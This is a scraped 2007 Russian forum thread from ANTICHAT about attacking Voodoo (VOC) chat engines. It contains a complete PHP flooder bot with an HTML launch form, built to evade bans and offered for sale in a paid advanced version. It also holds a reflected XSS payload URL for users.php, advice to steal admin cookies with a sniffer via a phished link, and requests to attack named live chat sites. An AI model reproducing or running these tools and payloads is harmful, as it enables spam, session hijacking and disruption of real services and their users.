ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.04.2007, 00:44
|
|
Новичок
Регистрация: 13.04.2007
Сообщений: 3
Провел на форуме:
25268
Репутация:
0
|
|
Сообщение от cyber_rat
alert(/test/); - выводит окошко с надписью /test/
но ни alert(test);, ни alert("test");, ни alert('test'); не выводят ничего.
а нащет скрипта,думаю там филтр какой то стоит.
ну и толку с етой XSS мало.. и так кукизы не передаются, да и с кукизов толку мало.. сессия не в них
|
|
|
14.04.2007, 13:13
|
|
Новичок
Регистрация: 12.04.2007
Сообщений: 2
Провел на форуме:
6773
Репутация:
1
|
|
Знаю что лол) но обьясните как открыть html страницу sendera? если вы про просмотр хтмл кода, то у сендера он не открываетЦа.
|
|
|
|
14.04.2007, 19:56
|
|
Новичок
Регистрация: 02.02.2007
Сообщений: 3
Провел на форуме:
3179
Репутация:
1
|
|
neval где навископ скачать,а то ссылки везде убитые,а мой нависком непашет
|
|
|
|
14.04.2007, 22:26
|
|
Новичок
Регистрация: 13.04.2007
Сообщений: 3
Провел на форуме:
25268
Репутация:
0
|
|
2 Apel1sin
http://syzspectroom.phpnet.us/NAVUNS.rar точно рабочий.. залил только что
|
|
|
|
25.04.2007, 21:58
|
|
Новичок
Регистрация: 24.04.2007
Сообщений: 3
Провел на форуме:
15590
Репутация:
0
|
|
Сообщение от D1mOn
Ето пассивные Xss, вместо алерта фтыкай сниффер, кинь ссылку админу в приват, и надейся, и жди, что админ глупым оказался. Или как уже было выше сказано попробуй через фреймы =)
Блин пацаны всё уже пробовал на http://www.love-chat.ru/voc.php и три разных снифа засылал в ответ молчёк может что не так делаю? Вот мужчины не поленитесь объясните чайнику,но стремящемуся из чайников в самовары)), на пальцах как вы это делаете. А то тут такая ситуация админы-гестаповцы и все как один орут что наш чат не ломается обидно просто. Хочется большими буквами написать в центре "Свобода" и повесить рисунок паука)))). Помогите если не трудно
|
|
|
|
08.05.2007, 01:17
|
|
Новичок
Регистрация: 07.05.2007
Сообщений: 3
Провел на форуме:
35605
Репутация:
0
|
|
Уважаемые хакеры есле вам не трудно попробуйте чат http://chatica.ru
|
|
|
|
15.06.2007, 14:59
|
|
Познающий
Регистрация: 24.06.2005
Сообщений: 79
Провел на форуме:
227039
Репутация:
11
|
|
php Флудер для Voc чатов
vocflood.php
PHP код:
<?
######### #########
######### G h o _ s t [ c ] 2 o o 7 #########
######### #########
$k = mt_rand(0,99);
mt_srand(time() + (double)microtime()*$k);
$chat=$_GET['chat'];
$name=$_GET['name'];
$pass=$_GET['pass'];
$Text=$_GET['Text'];
$r = $_GET['r'];
$SID = join('',file("$chat./voc.php?user_name=$name&password=$pass&room=$r"));
$st1 = strpos($SID,"?session=");
$SID = substr($SID,$st1+9);
$st2 = strpos($SID,"&");
$SID = substr($SID,0,$st2); # сессия
$Color = mt_rand(0, 22); # случайный цвет
$Text = $Text.mt_rand(0,999);$Text = UrlEncode($Text);
$df = file("$chat./sender.php?session=$SID&mesg=$Text&user_color=$Color");
$df2 = file("$chat/logout.php?session=$SID");
echo "<script language=javascript>document.location.reload();</script>";
?>
и HTML форма для удобства
Код HTML:
<HTML>
<h1>Voodoo chat flooder</h1><h2>by Gho_st</h2>
<form action="vocflood.php" method="GET">
Аддрес чата <input type=text name=chat value="http://"><br>
Ник <input type=text name=name><br>
Пароль <input type=text name=pass><br>
Строка <input type=text name=Text><br>
Комната <select name="r" class="input" tabindex="102">
<option value="0" selected>1</option>
<option value="1">2</option>
<option value="2">3</option>
<option value="3">4</option>
<option value="4">5</option>
</select>
<input type=submit value="Запустить">
</HTML>
уже вроде был выложен один флудер для voc чатов
мой флудер имеет некотрые преимущества перед ним
в частности не надо каждый раз вписывать сессию
+ он рабоает циклично заходит отправляет сообщение выходит
таким образом забанить такого бота не такто просто
___
з.ы. есть более продвинутая версия бота
недорого ... пишите в асю
Последний раз редактировалось Gho_st; 17.06.2007 в 19:44..
|
|
|
|
17.06.2007, 19:48
|
|
Познающий
Регистрация: 24.06.2005
Сообщений: 79
Провел на форуме:
227039
Репутация:
11
|
|
к сожелению при тестирование флудера на движке VOC++ Business Edition
было выявлено то что сообщения не отправляются
хм.. почему то вобще при передаче GET запросом сессии и текста сообщения мессага не отправляется=((
если ктонибудь знает в чем трабла просветите
|
|
|
|
29.06.2007, 19:27
|
|
Познающий
Регистрация: 24.06.2005
Сообщений: 79
Провел на форуме:
227039
Репутация:
11
|
|
ещё один XSS в Voc
Код:
http://sitename/chat/users.php?look_for=%3CSCRIPT%3Ealert('XSS')%3C/SCRIPT%3E
|
|
|
|
01.08.2007, 11:48
|
|
Banned
Регистрация: 21.07.2007
Сообщений: 504
Провел на форуме:
1899369
Репутация:
445
|
|
У нас любимая бага была в сети..стоял у нас VOC++ Christ. Edit..ещё и дэмо =)
Собирали чел 5 и зажимали ENTER или пихали спички. Вот весёлые были времена  |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
